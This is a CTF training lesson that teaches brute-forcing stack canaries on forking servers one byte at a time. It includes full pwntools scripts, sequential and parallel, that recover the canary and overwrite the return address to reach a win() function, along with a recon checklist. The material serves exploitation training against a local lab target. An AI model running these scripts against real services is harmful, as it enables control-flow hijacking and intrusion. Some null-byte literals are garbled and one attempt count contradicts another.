Browse CTFs New CTF Sign in

Canary Brute-Force on Forking Servers: Byte-by-Byte Enumeration Exploiting fork() Memory Inheritance

reverse_engineering Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Forking servers — like Apache pre-fork, xinetd-managed daemons, and many CTF challenge servers — call fork() to handle each connection. The child process inherits an exact copy of the parent's memory, including the TLS canary at fs:0x28. Because the canary is the same across all forks of the same parent process, it can be brute-forced byte by byte without an explicit information-leak primitive. The attack requires at most 256 × 8 = 2048 connection attempts to recover all 8 bytes. NICE K0168 and S0131 require understanding this forking-server property and how to implement an efficient byte-by-byte oracle. This is the standard technique when no format string or other info-leak is available.

Core Concept

fork() creates a child process with a copy of the parent's address space, including: - Stack contents (and therefore the canary on the stack at the point of fork) - TLS segment at fs:0x28 (the master canary value) - Heap, globals, and all other memory

The child's canary is identical to the parent's. When the child crashes (SIGSEGV or __stack_chk_fail), the parent continues and the next fork() call creates another child with the same canary. This gives an attacker an unlimited oracle: send a candidate canary, observe whether the process crashes or continues, repeat.

Byte-by-byte oracle: instead of guessing all 8 bytes at once (256^8 attempts), guess one byte at a time:

  1. Fix the known prefix (start with x00 for byte 0 — canary always starts with null)
  2. Try all 256 values for byte 1: send overflow with x00 + candidate_byte + x00*6 + garbage_rbp + garbage_rip
  3. If the process does not crash (or responds normally), the candidate byte is correct
  4. Move to byte 2, keep byte 1 fixed, repeat

Total attempts: 1 (byte 0, always x00) + 256×7 = 1793 attempts maximum. Average: 1 + 128×7 = 897 attempts.

Detecting crash vs. success: the oracle response depends on the server's behavior: - Connection closed without response: crash (SIGSEGV or __stack_chk_fail) - Connection sends expected response: success — candidate byte is correct

Technical Deep-Dive

from pwn import *
import sys

HOST = 'localhost'
PORT = 9999

def try_canary(canary_bytes):
    """Send overflow with candidate canary; return True if process survives."""
    try:
        r = remote(HOST, PORT, timeout=2)
        r.recvuntil(b'Input: ', timeout=2)

        # buf_size = 64 bytes to reach canary; adjust for your target
        buf_size = 64
        payload  = b'A' * buf_size          # fill buffer
        payload += canary_bytes              # candidate canary (partial or full)
        payload += b'B' * 8                # saved RBP placeholder
        payload += b'C' * 8                # saved RIP placeholder
        r.sendline(payload)

        # If the server echoes back something / sends a menu again: success
        response = r.recv(timeout=1)
        r.close()
        return len(response) > 0
    except Exception:
        return False

def brute_canary():
    canary = b'x00'    # low byte always 0x00

    for byte_idx in range(1, 8):
        found = False
        for candidate in range(0x00, 0x100):
            probe = canary + bytes([candidate]) + b'x00' * (7 - byte_idx)
            if try_canary(probe):
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x}  canary so far: {canary.hex()}')
                found = True
                break
        if not found:
            log.error(f'Failed at byte {byte_idx}')
            sys.exit(1)

    return canary

canary = brute_canary()
log.success(f'Full canary: {canary.hex()} = {u64(canary):#018x}')

# Now use the leaked canary for the real exploit
r = remote(HOST, PORT)
r.recvuntil(b'Input: ')
payload  = b'A' * 64
payload += canary
payload += p64(0xdeadbeef)    # saved RBP
payload += p64(0x401234)      # win() address
r.sendline(payload)
r.interactive()

Timing optimization: parallelise byte guesses per position — send 256 connections simultaneously (or in batches), observe which one succeeds. This reduces wall-clock time from minutes to seconds:

from concurrent.futures import ThreadPoolExecutor, as_completed

def check_byte(byte_idx, candidate, known_prefix):
    probe = known_prefix + bytes([candidate]) + b'x00' * (7 - byte_idx)
    return candidate, try_canary(probe)

canary = b'x00'
for byte_idx in range(1, 8):
    with ThreadPoolExecutor(max_workers=32) as executor:
        futures = {
            executor.submit(check_byte, byte_idx, c, canary): c
            for c in range(0x100)
        }
        for future in as_completed(futures):
            candidate, success = future.result()
            if success:
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x}')
                break

Reverse Engineering Methodology

  1. Confirm the server forks: strace -e trace=clone,fork ./server or pstree during connection to see if child processes spawn. A new PID per connection confirms forking.
  2. Confirm the canary is consistent: connect twice, trigger a crash on both, observe that the crash report (core dump, dmesg) shows the same corrupted canary value. If values differ, the server does not fork (or re-randomises).
  3. Find the buffer-to-canary offset: connect once, send cyclic(200), observe the crash offset. Subtract to find exactly how many bytes fill the buffer before the canary position.
  4. Automate with pwntools: use remote() in a loop with appropriate timeout settings. The crash causes an RST packet (connection reset), which pwntools registers as an exception — catch it to detect the "wrong candidate" case.

Common Reversing Errors

  • Assuming all servers are forking: thread-based servers do not fork; they share the same canary trivially (it is process-wide), but crashing one thread crashes all threads — the oracle breaks. Connection-reset detection still works but the canary is the same for all connections, so only one successful attempt is needed per byte if you can recover.
  • Including wrong null byte in byte 0: the canary's first byte is always x00. If you start the probe with a non-null byte 0, every attempt at byte 1 will fail because the canary comparison fails at byte 0. Always fix byte 0 as x00.
  • Slow sequential guessing making the challenge time out: many CTF challenges have connection rate limits or total time limits. Use parallelism (as shown above) to complete the brute force within a minute rather than an hour.
  • Mistaking a canary check failure for the overflow itself: __stack_chk_fail calls abort(), which sends SIGABRT. The process exits with signal 6, not SIGSEGV (signal 11). Both result in connection closure, but if you have shell access, checking $? or dmesg distinguishes them.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.